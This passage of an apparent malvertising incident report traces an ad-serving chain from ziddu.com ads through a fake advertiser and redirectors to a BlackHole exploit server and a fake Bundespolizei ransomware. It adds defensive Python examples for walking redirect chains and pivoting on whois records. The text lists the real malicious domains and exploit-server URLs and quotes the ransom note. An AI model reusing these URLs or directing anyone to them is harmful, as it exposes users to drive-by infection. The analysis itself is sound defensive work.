Link 5: (Ad Network) http://ad.globe7.com/iframe3?2YA.ABrCDABgVKUAAAAAAMWJKAAAAAAAAgAEAAYAAAAAAP8AAAACBvPdGQAAAAAAIrsPAAAAAACYIzUAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAABZlQYAAAAAAAIAAwAAAAAAASuHFtnOtz8BK4cW2c63PwErhxbZzsc.ASuHFtnOxz8zMzMzMzPTPzMzMzMzM9M.AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAACkuxJPXfCjCqRit3MeuQtEnvXOi1a6Cp0X0hsNAAAAAA==,,http%3A%2F%2Fwww.ziddu.com%2F,B%3D10%26Z%3D728x90%26_salt%3D2314211323%26r%3D0%26s%3D836122,a5451910-d1f1-11e0-906f-87d5341e0e89, which throws an HTTP 302 redirect to:

Link 6: (Ad Network) http://ad.yieldmanager.com/iframe3?2YA.ABrCDABgVKUAAAAAAMWJKAAAAAAAAgAEAAYAAAAAAP8AAAACBvPdGQAAAAAAIrsPAAAAAACYIzUAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAABZlQYAAAAAAAIAAwAAAAAAASuHFtnOtz8BK4cW2c63PwErhxbZzsc.ASuHFtnOxz8zMzMzMzPTPzMzMzMzM9M.AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAACkuxJPXfCjCqRit3MeuQtEnvXOi1a6Cp0X0hsNAAAAAA==,,http%3A%2F%2Fwww.ziddu.com%2F,B%3D10%26Z%3D728x90%26_salt%3D2314211323%26r%3D0%26s%3D836122,a5451910-d1f1-11e0-906f-87d5341e0e89, which contains javascript that a) displays the malicious ad, and b) generates an iframe to the exploit server. Note the iframe URL ends with .jpg in order to disguise and be less obvious.
(The full copy-able text of this script was posted on snipt.)
Link 7-a: (Fake Advertiser, Creative) http://kineticgames.info/images/728x90-1-1.gif, which is the actual malicious creative (malvertisement).
Link 7-b: (Fake Advertiser, malicious script) http://kineticgames.info/pubage/728x90.jpg; although the URL ends in .jpg, it actually serves HTML containing an iframe pointing to:

Link 8: (Malicious redirector) http://sahoreen.in/hitcounter.php?u=pubage, which contains an iframe pointing to:

Link 9: (Malicious redirector) http://belygaur.in/ts/in.cgi?pubage, which throws an HTTP 302 redirect pointing to the exploit server:

Link 10: (Exploit server) http://town.incredibleoutcomes.com/index.php?tp=7058439543afabcf, which serves the BlackHole exploit pack. This is not a domain registered by the attacker, but a legitimate domain that has been compromised.
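The chain above is a sequence of two mechanisms a scanner has to follow mechanically: HTTP 302 redirects and script-generated iframes, with the disguised hop (Link 7-b) being the one whose URL looks like an image but whose response is HTML. The following is an added example, not Armorize's HackAlert code or anything from the report; it walks a constructed chain of responses of the same shape (placeholder hostnames, not the domains listed above), follows each redirect and the first iframe on each page, and flags any hop whose image-looking extension is served as text/html.

```python
import re
from urllib.parse import urljoin

# Constructed sample responses mimicking the shape of the ad-serving chain in the trace:
# ad-network tag -> 302 -> "image" URL that really serves HTML -> redirector -> landing page.
# Hostnames and values are placeholders for this example, not the domains named in the report.
# Each entry: url -> (status, content_type, location, body)
SAMPLE_RESPONSES = {
    "http://ads.adnet.example/st?ad_type=iframe&section=1": (
        200, "text/html", None,
        '<script>document.write("<iframe src=\\"http://ads.adnet.example/imp?s=1\\" '
        'width=728 height=90></iframe>")</script>'),
    "http://ads.adnet.example/imp?s=1": (
        302, "", "http://creative.fakeadvertiser.example/pubage/728x90.jpg", ""),
    "http://creative.fakeadvertiser.example/pubage/728x90.jpg": (
        200, "text/html", None,
        '<html><body><iframe src="http://redir.example/hitcounter.php?u=pubage" '
        'width=1 height=1></iframe></body></html>'),
    "http://redir.example/hitcounter.php?u=pubage": (
        302, "", "http://compromised-site.example/index.php?tp=PLACEHOLDER", ""),
    "http://compromised-site.example/index.php?tp=PLACEHOLDER": (
        200, "text/html", None, "<html><body>landing page</body></html>"),
}
START_URL = "http://ads.adnet.example/st?ad_type=iframe&section=1"

REDIRECT_CODES = {301, 302, 303, 307, 308}
IMAGE_EXTENSIONS = (".jpg", ".jpeg", ".gif", ".png")
# Tolerates the escaped quotes that appear when an iframe is emitted via document.write().
IFRAME_SRC = re.compile(r"""<iframe[^>]*\bsrc\s*=\s*[\\"']*([^"'\\ >]+)""", re.IGNORECASE)


def fetch_sample(url):
    """Stand-in for an HTTP client; returns the constructed response or None."""
    return SAMPLE_RESPONSES.get(url)


def walk_ad_chain(start_url, fetch=fetch_sample, max_hops=20):
    """Follow redirects and the first iframe of each page from start_url, recording
    every hop and flagging URLs that look like images but are served as HTML."""
    chain, findings, seen = [], [], set()
    url = start_url
    while url and url not in seen and len(chain) < max_hops:
        seen.add(url)
        resp = fetch(url)
        if resp is None:
            chain.append((url, None))
            break
        status, ctype, location, body = resp
        chain.append((url, status))
        path = url.split("?", 1)[0].lower()
        if path.endswith(IMAGE_EXTENSIONS) and "text/html" in ctype.lower():
            findings.append(f"extension/content-type mismatch: {url} served as {ctype}")
        if status in REDIRECT_CODES and location:
            url = urljoin(url, location)
            continue
        srcs = IFRAME_SRC.findall(body)
        url = urljoin(url, srcs[0]) if srcs else None
    hosts = {u.split("/")[2] for u, _ in chain if "//" in u}
    return {"chain": chain, "final_url": chain[-1][0],
            "hosts": sorted(hosts), "findings": findings}


if __name__ == "__main__":
    result = walk_ad_chain(START_URL)
    for hop, status in result["chain"]:
        print(status, hop)
    for finding in result["findings"]:
        print("FINDING:", finding)
```

The walker is deliberately linear (first iframe only), which is enough for an ad tag that fans out to a single creative; a production scanner would queue every iframe and script source it finds. The extension-versus-content-type check is the cheap signal worth keeping: a creative host returning HTML for a .jpg path is exactly what Link 7-b relies on.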

[Malvertising Analysis--The Puzzle]

Below are some causes of malvertising:

a) The attacker pretends to be a legitimate advertiser, submits a malicious ad (malvertisement) to an ad network, and tricks the ad network into accepting the submission.

b) The ad network was compromised, and the attacker injected malicious scripts into a link in the ad-serving chain.

So which case is this? Well for this particular case, it was a bit difficult for us to determine.

Upon first look, it seems to be case (a), because the advertiser in this case--kineticgames.info (184.172.216.234, ASN 36351, US Dallas)--has a whois record with a Russian name and street address, yet uses a US IP and an Indian domain name for its name server (ns1.plumdook.in).

HOWEVER, the domain was registered on Aug 9th, 2010, a year ago, and from the screenshot below you can see that it seems to be quite a legitimate website:
Compared to many malvertising incidents we've studied, most fake domains will have been registered very recently and will either not have any website content, or will have content illegally mirrored (copied) from other websites.

This doesn't seem to be the case. So, is it case (b), where kineticgames.info is indeed a legitimate website, but has been compromised to serve malvertisements?

Seems reasonable, but only until we look at the other associated malicious domains. These are:

sahoreen.in (184.172.216.234, ASN 36351, US Dallas)
belygaur.in (184.172.216.234, ASN 36351, US Dallas)

These two domains were both created very recently, on the same day--July 7th, 2011. The whois records show the registrant to be "Piotr Poshkin," which resembles kineticgames.info's current "Vasiliy Pushkin." Furthermore, the phone number, street address, and zip codes are exactly the same as kineticgames.info's.

Kineticgames.info actually has a sister domain name: kinetic-games.com, registered on the same day last year (Aug 9th, 2010), and serving the same content. Both were initially registered under Bob Stevenson of Spain. Then, on July 14th and July 17th, 2011, kinetic-games.com and kineticgames.info were respectively transferred to the current contact (according to whois records), "Vasiliy Pushkin" of Russia.

Could it be, that it is the new owner, who is intentionally doing malvertising using these domains and the website, because the identity is seemingly legit?

Or could it be that none of this matters, and that kineticgames.info has simply been hacked, the attackers used it to submit the malvertisement, and they intentionally registered the malicious redirector domains sahoreen.in and belygaur.in with whois records that resemble that of kineticgames.info?

Finally, two additional pieces of important information. First, according to Internet Archive (Wayback Machine), as of Jan 28th, 2011, kinetic-games.com had no actual website content--the owner was just registering the domain to sell as a premium domain:

Second, the website as of now, contains lots of vulnerabilities. It should be quite easy for someone to hack into both websites.

So what's the deal here?

We cannot make a conclusion right here. Perhaps the reader can help solve the puzzle?
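The reasoning in this section is a registrant pivot: start from one domain's whois record, find other domains that share its phone, street address and zip code, and weigh each hit by how recently it was created, how recently the seed record changed hands, and how close the registrant names are. The following is an added example, not the report's own tooling; the whois-style records, dates and contact fields are constructed placeholders shaped like the observations above (only the two registrant surnames are taken from the report), and the incident date is an assumption made for the example.

```python
from datetime import date

# Constructed whois-style records for the example. Domains, dates and contact fields
# are placeholders shaped like the report's observations, not the real records;
# the two registrant surnames come from the report. INCIDENT_DATE is assumed.
INCIDENT_DATE = date(2011, 8, 29)
RECORDS = [
    {"domain": "legit-looking.example", "created": date(2010, 8, 9), "updated": date(2011, 7, 17),
     "registrant": "Vasiliy Pushkin", "phone": "+7.0000000001", "street": "1 Example Street",
     "zip": "000001", "ns": "ns1.dns.example"},
    {"domain": "redirector-one.example", "created": date(2011, 7, 7), "updated": None,
     "registrant": "Piotr Poshkin", "phone": "+7.0000000001", "street": "1 Example Street",
     "zip": "000001", "ns": "ns1.other.example"},
    {"domain": "redirector-two.example", "created": date(2011, 7, 7), "updated": None,
     "registrant": "Piotr Poshkin", "phone": "+7.0000000001", "street": "1 Example Street",
     "zip": "000001", "ns": "ns1.other.example"},
    {"domain": "unrelated.example", "created": date(2008, 3, 1), "updated": None,
     "registrant": "Someone Else", "phone": "+1.5550000000", "street": "9 Other Road",
     "zip": "99999", "ns": "ns1.dns.example"},
]
PIVOT_FIELDS = ("phone", "street", "zip", "ns")


def levenshtein(a, b):
    """Edit distance, used to catch near-identical registrant surnames."""
    prev = list(range(len(b) + 1))
    for i, ca in enumerate(a, 1):
        cur = [i]
        for j, cb in enumerate(b, 1):
            cur.append(min(prev[j] + 1, cur[j - 1] + 1, prev[j - 1] + (ca != cb)))
        prev = cur
    return prev[-1]


def pivot_on_registrant(records, seed_domain, incident_date=INCIDENT_DATE, recent_days=90):
    """Return records sharing contact fields with the seed domain's record.
    Each hit lists the matching fields, the domain's age at the incident, whether it
    was created shortly before it, and the surname edit distance to the seed registrant."""
    seed = next(r for r in records if r["domain"] == seed_domain)
    seed_surname = seed["registrant"].split()[-1].lower()
    hits = []
    for r in records:
        if r["domain"] == seed_domain:
            continue
        shared = [f for f in PIVOT_FIELDS if r.get(f) and r.get(f) == seed.get(f)]
        if not shared:
            continue
        age = (incident_date - r["created"]).days
        hits.append({
            "domain": r["domain"],
            "shared": shared,
            "age_days": age,
            "recently_created": age <= recent_days,
            "surname_distance": levenshtein(r["registrant"].split()[-1].lower(), seed_surname),
            # A lone shared nameserver is weak evidence (shared hosting); contact data is not.
            "strong": "phone" in shared or len(shared) >= 2,
        })
    return sorted(hits, key=lambda h: (-len(h["shared"]), h["domain"]))


def ownership_changed_recently(record, incident_date=INCIDENT_DATE, window_days=90):
    """True if the record was updated (e.g. transferred) within window_days before the incident."""
    if record["updated"] is None:
        return False
    return 0 <= (incident_date - record["updated"]).days <= window_days


if __name__ == "__main__":
    for hit in pivot_on_registrant(RECORDS, "legit-looking.example"):
        print(hit)
    print("seed changed hands recently:", ownership_changed_recently(RECORDS[0]))
```

Note the ranking: two domains created weeks before the incident that share phone, street and zip with the seed rank above a domain that merely shares a nameserver, which is the distinction the analysis above draws between the redirector domains and an ordinary co-hosted site. The pivot tells you the domains belong together; as the section says, it cannot by itself tell you whether the seed domain's new owner or a third party who compromised it set them up.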

[The Malware]

The malware pretends to be crime-detection software from the Federal German Police. As you can see in the screenshot above, it uses a logo stolen from the real Federal German Police (Bundespolizei). It claims to have found child pornography along with other illegal content on the victim's computer. It claims that the victim's IP, OS, location, ISP, etc, have all been recorded, and locks down the computer completely, "to prevent further abuse."

A fine of 100 Euros must be paid within 24 hours to unlock the computer, or else all data will be deleted.

This strain of ransomware has been around for a few months already, but improvements seen in this version include:

a) They now use an email address, "einzahlung@bundespol.net", that somewhat resembles the real Federal German Police domain, "@bundespolizei.de". The domain was registered through Bizcn.com, a registrar in China.

b) They now support two payment gateways, UKash and paysafecard.

Below is a translation of the text:

Attention!

Illegal operational activities have been detected. Based on laws of the Federal Republic of Germany, the system has been locked. The following legal violation has been detected: Your IP _______ was detected to have visited pages containing pornography, child pornography, bestiality and violence against children. At the same time, your computer has been identified to contain video files involving pornography, violence, and child pornography content! Furthermore, spam emails containing terrorism content were also sent from here. Your computer is therefore locked in order to eliminate the above illegal activities.

Your details:
IP, location, OS, ISP, etc.

In order to unlock this computer, you are obligated by law to pay a 100 Euro fine. You must make the payment within 24 hours. If payment has not been made within the allotted time, your hard disk will be irreversibly formatted.

1) Payment via Ukash:

To perform the transaction, please enter your purchased voucher code into the payment textbox and press OK. In case of errors, you should email your code to einzahlung@bundespol.net.

2) Payment via paysafecard:

Please input the code into the payment textbox and press OK. In case of errors, you should email your code to einzahlung@bundespol.net.

